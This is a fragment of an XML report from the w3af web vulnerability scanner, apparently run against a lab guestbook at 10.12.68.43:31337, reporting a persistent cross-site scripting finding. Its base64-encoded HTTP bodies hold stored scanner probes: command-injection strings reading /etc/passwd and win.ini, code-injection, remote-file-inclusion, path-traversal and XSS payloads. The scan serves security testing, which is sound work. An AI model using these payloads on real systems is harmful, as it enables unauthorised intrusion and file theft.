bDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5oVHRQOi8vdzNhZi5vcmcvcmZpLmh0bWw8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+aG53a2E8
Ly0+PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmY0bHFn
Lyo8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+a2tyeXJg
a2tyeXI8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+czVs
c2EgPTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5jZ2pi
aiJjZ2piajwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4vdXNyL3NiaW4vcGluZyAt
cyBsb2NhbGhvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiYmcGluZyAtbiA0IGxvY2FsaG9z
dDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5UaHJlYWQuc2xlZXAoMzAwMCk7PC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPlRocmVhZC5zbGVlcCgzMDAwKTs8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JiZw
aW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPlRocmVhZC5TbGVlcCgzMDAwKTs8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+VGhyZWFkLlNsZWVwKDMwMDApOzwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD4mJi91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsPC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnxwaW5nIC1u
IDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPnxwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnwvdXNy
L3NiaW4vcGluZyAtcyBsb2NhbGg8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+O3BpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+O3BpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+Oy91c3Ivc2Jpbi9waW5nIC1zIGxvY2Fs
aDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2Nh
bGhvc3RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+cGluZyAtYyA0IGxvY2FsaG9zdDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vdXNyL3Ni
aW4vcGluZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD4mJnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JiZwaW5nIC1jIDQg
bG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPiYmL3Vzci9zYmluL3BpbmcgLXMgbG9jYWxob3N0IDQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHBpbmcgLW4gNCBsb2Nh
bGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+fHBpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fC91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaG9zdCA0
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PjtwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPjtwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjsvdXNyL3NiaW4vcGlu
ZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhv
c3RgPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgo=
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[841, 1175]" method="POST" name="Persistent Cross-Site Scripting vulnerability" plugin="xss" severity="High" url="http://10.12.68.43:31337/post" var="message">
        <description>A persistent Cross Site Scripting vulnerability was found by sending &quot;hnwka&lt;/-&gt;&quot; to the &quot;message&quot; parameter at http://10.12.68.43:31337/post, which is echoed when browsing to http://10.12.68.43:31337/.</description>
        <http-transactions>
            <http-transaction id="841">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="33" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1obndrYSUzQyUyRi0lM0UmcHNldWRvPTU2
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1175">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="base64">ICAgIDxwPjxhIGhyZWY9Jy9wb3N0Jz5sZWF2ZSBhIG1lc3NhZ2UhPC9hPjwvcD4KICAgIDxociAv
PgogICAgICAgIDxwPm1hbm55PC9wPgogICAgICAgIDxwPmJlYXV0aWZ1bCB3ZWJzaXRlITwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD5tYW5ueTwvcD4KICAgICAgICA8cD5pJ3ZlIGdvdCBu
b3RoaW5nIGVsc2UgdG8gZG88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+PC9wPgogICAg
ICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5SZXNwb25zZS5Xcml0
ZShuZXcgU3RyaW5nPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlJlc3BvbnNlLldyaXRlKG5ldyBTdHJpbmco
Inp6cnBuIiw1KSk8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9w
YXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+dHlwZSAlU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD4mJi9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiYmL2Jpbi9jYXQgL2V0
Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JiZ0eXBlICVTWVNURU1ST09U
JXdpbi5pbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD4mJnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD58L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+fC9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPnx0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHR5cGUgJVNZ
U1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD47L2Jpbi9jYXQg
L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Oy9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjt0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+O3R5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5gL2Jpbi9jYXQgL2V0Yy9wYXNzd2RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmAvYmlu
L2NhdCAvZXRjL3Bhc3N3ZGA8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cnVuIHR5cGUg
JVNZU1RFTVJPT1Qld2luLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5ydW4gdHlwZSAlU1lTVEVNUk9PVCV3
aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjk4MjkzOTAwPC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnBvc3Q8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+cG9zdDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
